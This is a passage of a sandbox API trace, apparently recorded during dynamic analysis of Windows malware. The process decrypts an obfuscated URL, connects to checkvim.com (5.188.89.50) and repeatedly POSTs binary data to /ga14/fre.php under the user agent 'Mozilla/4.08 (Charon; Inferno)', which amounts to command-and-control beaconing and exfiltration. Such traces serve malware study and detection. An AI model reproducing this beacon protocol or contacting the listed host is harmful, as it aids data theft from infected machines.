Size=0xae) returned 0x870448 [0330.393] GetProcessHeap () returned 0x840000 [0330.393] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8885d0 | out: hHeap=0x840000) returned 1 [0330.393] GetProcessHeap () returned 0x840000 [0330.393] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f878 [0330.393] GetProcessHeap () returned 0x840000 [0330.393] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8885d0 [0330.394] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0330.395] wvsprintfA (in: param_1=0x8885d0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0330.395] GetProcessHeap () returned 0x840000 [0330.395] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0330.395] GetProcessHeap () returned 0x840000 [0330.395] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8885d0 | out: hHeap=0x840000) returned 1 [0330.395] send (s=0x5bc, buf=0x873a58*, len=237, flags=0) returned 237 [0330.396] send (s=0x5bc, buf=0x87eb58*, len=159, flags=0) returned 159 [0330.396] GetProcessHeap () returned 0x840000 [0330.396] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0330.396] recv (in: s=0x5bc, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0330.795] GetProcessHeap () returned 0x840000 [0330.795] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0330.795] GetProcessHeap () returned 0x840000 [0330.795] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f878 | out: hHeap=0x840000) returned 1 [0330.795] GetProcessHeap () returned 0x840000 [0330.795] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0330.796] GetProcessHeap () returned 0x840000 [0330.796] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0330.796] closesocket (s=0x5bc) returned 0 [0330.797] GetProcessHeap () returned 0x840000 [0330.797] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b48 | out: hHeap=0x840000) returned 1 [0330.797] GetProcessHeap () returned 0x840000 [0330.797] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0330.797] GetProcessHeap () returned 0x840000 [0330.797] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f8c0 | out: hHeap=0x840000) returned 1 [0330.797] GetProcessHeap () returned 0x840000 [0330.797] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0330.797] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x109c) returned 0x5bc [0330.799] Sleep (dwMilliseconds=0xea60) [0330.827] GetProcessHeap () returned 0x840000 [0330.827] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fe18 [0330.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.828] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0330.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.832] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0330.837] GetProcessHeap () returned 0x840000 [0330.837] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0330.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.838] CryptImportKey (in: hProv=0x86ff90, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9b0) returned 1 [0330.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.839] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0330.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.839] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0330.839] GetProcessHeap () returned 0x840000 [0330.839] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0330.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.840] CryptDecrypt (in: hKey=0x87e9b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fe18, pdwDataLen=0x19f9a4 | out: pbData=0x87fe18, pdwDataLen=0x19f9a4) returned 1 [0330.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.841] CryptDestroyKey (hKey=0x87e9b0) returned 1 [0330.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.842] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0330.842] GetProcessHeap () returned 0x840000 [0330.842] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0330.842] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0330.842] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0330.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0330.848] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0330.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0330.848] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0330.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0330.849] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0330.849] GetProcessHeap () returned 0x840000 [0330.849] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0330.849] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0330.849] GetProcessHeap () returned 0x840000 [0330.849] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0330.849] GetProcessHeap () returned 0x840000 [0330.849] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0330.849] GetProcessHeap () returned 0x840000 [0330.850] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fe18 | out: hHeap=0x840000) returned 1 [0330.850] GetProcessHeap () returned 0x840000 [0330.850] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa28 [0330.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.850] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0330.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.854] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f930) returned 1 [0330.859] GetProcessHeap () returned 0x840000 [0330.859] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0330.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.860] CryptImportKey (in: hProv=0x86f930, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e330) returned 1 [0330.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.860] CryptSetKeyParam (hKey=0x87e330, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0330.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.861] CryptSetKeyParam (hKey=0x87e330, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0330.861] GetProcessHeap () returned 0x840000 [0330.861] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0330.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.862] CryptDecrypt (in: hKey=0x87e330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa28, pdwDataLen=0x19f9a4 | out: pbData=0x87fa28, pdwDataLen=0x19f9a4) returned 1 [0330.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.863] CryptDestroyKey (hKey=0x87e330) returned 1 [0330.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0330.864] CryptReleaseContext (hProv=0x86f930, dwFlags=0x0) returned 1 [0330.864] GetProcessHeap () returned 0x840000 [0330.864] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0330.864] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0330.864] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0330.865] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0330.865] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0330.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0330.866] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0330.866] GetProcessHeap () returned 0x840000 [0330.866] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0330.866] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0330.868] GetProcessHeap () returned 0x840000 [0330.868] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b28 [0330.868] socket (af=2, type=1, protocol=6) returned 0x5c0 [0330.868] connect (s=0x5c0, name=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0330.936] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0330.936] GetProcessHeap () returned 0x840000 [0330.936] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0330.936] GetProcessHeap () returned 0x840000 [0330.936] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8885d0 [0330.937] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0330.938] wvsprintfA (in: param_1=0x8885d0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0330.938] GetProcessHeap () returned 0x840000 [0330.938] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0330.938] GetProcessHeap () returned 0x840000 [0330.938] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8885d0 | out: hHeap=0x840000) returned 1 [0330.938] GetProcessHeap () returned 0x840000 [0330.938] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fb48 [0330.938] GetProcessHeap () returned 0x840000 [0330.938] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8885d0 [0330.939] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0330.940] wvsprintfA (in: param_1=0x8885d0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0330.940] GetProcessHeap () returned 0x840000 [0330.940] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0330.941] GetProcessHeap () returned 0x840000 [0330.941] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8885d0 | out: hHeap=0x840000) returned 1 [0330.941] send (s=0x5c0, buf=0x873a58*, len=237, flags=0) returned 237 [0330.941] send (s=0x5c0, buf=0x87eb58*, len=159, flags=0) returned 159 [0330.941] GetProcessHeap () returned 0x840000 [0330.941] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0330.941] recv (in: s=0x5c0, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0331.327] GetProcessHeap () returned 0x840000 [0331.327] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0331.327] GetProcessHeap () returned 0x840000 [0331.327] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0331.327] GetProcessHeap () returned 0x840000 [0331.327] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0331.327] GetProcessHeap () returned 0x840000 [0331.327] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0331.327] closesocket (s=0x5c0) returned 0 [0331.328] GetProcessHeap () returned 0x840000 [0331.328] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b28 | out: hHeap=0x840000) returned 1 [0331.328] GetProcessHeap () returned 0x840000 [0331.328] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0331.328] GetProcessHeap () returned 0x840000 [0331.328] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0331.328] GetProcessHeap () returned 0x840000 [0331.328] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0331.328] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xa8c) returned 0x5c0 [0331.330] Sleep (dwMilliseconds=0xea60) [0331.345] GetProcessHeap () returned 0x840000 [0331.345] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fbd8 [0331.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.346] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0331.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.356] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fac8) returned 1 [0331.363] GetProcessHeap () returned 0x840000 [0331.363] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0331.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.364] CryptImportKey (in: hProv=0x86fac8, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e430) returned 1 [0331.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.365] CryptSetKeyParam (hKey=0x87e430, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0331.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.366] CryptSetKeyParam (hKey=0x87e430, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0331.366] GetProcessHeap () returned 0x840000 [0331.366] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0331.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.367] CryptDecrypt (in: hKey=0x87e430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fbd8, pdwDataLen=0x19f9a4 | out: pbData=0x87fbd8, pdwDataLen=0x19f9a4) returned 1 [0331.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.367] CryptDestroyKey (hKey=0x87e430) returned 1 [0331.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.368] CryptReleaseContext (hProv=0x86fac8, dwFlags=0x0) returned 1 [0331.368] GetProcessHeap () returned 0x840000 [0331.368] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0331.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0331.369] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0331.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0331.370] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0331.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0331.370] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0331.371] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0331.371] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0331.371] GetProcessHeap () returned 0x840000 [0331.371] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0331.371] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0331.372] GetProcessHeap () returned 0x840000 [0331.372] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0331.372] GetProcessHeap () returned 0x840000 [0331.372] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0331.372] GetProcessHeap () returned 0x840000 [0331.372] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fbd8 | out: hHeap=0x840000) returned 1 [0331.372] GetProcessHeap () returned 0x840000 [0331.372] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f8c0 [0331.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.372] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0331.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.378] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0331.384] GetProcessHeap () returned 0x840000 [0331.384] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0331.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.385] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e430) returned 1 [0331.385] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.385] CryptSetKeyParam (hKey=0x87e430, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0331.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.386] CryptSetKeyParam (hKey=0x87e430, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0331.386] GetProcessHeap () returned 0x840000 [0331.386] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0331.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.387] CryptDecrypt (in: hKey=0x87e430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f8c0, pdwDataLen=0x19f9a4 | out: pbData=0x87f8c0, pdwDataLen=0x19f9a4) returned 1 [0331.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.388] CryptDestroyKey (hKey=0x87e430) returned 1 [0331.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0331.389] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0331.389] GetProcessHeap () returned 0x840000 [0331.389] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0331.389] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0331.390] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0331.390] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0331.390] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0331.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0331.391] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0331.391] GetProcessHeap () returned 0x840000 [0331.391] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713f8 [0331.391] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871420*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0331.393] GetProcessHeap () returned 0x840000 [0331.393] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c28 [0331.393] socket (af=2, type=1, protocol=6) returned 0x5c4 [0331.394] connect (s=0x5c4, name=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0331.458] FreeAddrInfoW (pAddrInfo=0x871420*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0331.458] GetProcessHeap () returned 0x840000 [0331.458] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f2d0 [0331.458] GetProcessHeap () returned 0x840000 [0331.458] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8885d0 [0331.459] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0331.460] wvsprintfA (in: param_1=0x8885d0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0331.460] GetProcessHeap () returned 0x840000 [0331.460] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0331.460] GetProcessHeap () returned 0x840000 [0331.460] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8885d0 | out: hHeap=0x840000) returned 1 [0331.460] GetProcessHeap () returned 0x840000 [0331.460] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fdd0 [0331.460] GetProcessHeap () returned 0x840000 [0331.460] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8885d0 [0331.461] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0331.462] wvsprintfA (in: param_1=0x8885d0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0331.462] GetProcessHeap () returned 0x840000 [0331.462] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0331.462] GetProcessHeap () returned 0x840000 [0331.462] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8885d0 | out: hHeap=0x840000) returned 1 [0331.462] send (s=0x5c4, buf=0x873a58*, len=237, flags=0) returned 237 [0331.463] send (s=0x5c4, buf=0x87eb58*, len=159, flags=0) returned 159 [0331.463] GetProcessHeap () returned 0x840000 [0331.463] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0331.463] recv (in: s=0x5c4, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0331.827] GetProcessHeap () returned 0x840000 [0331.827] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: 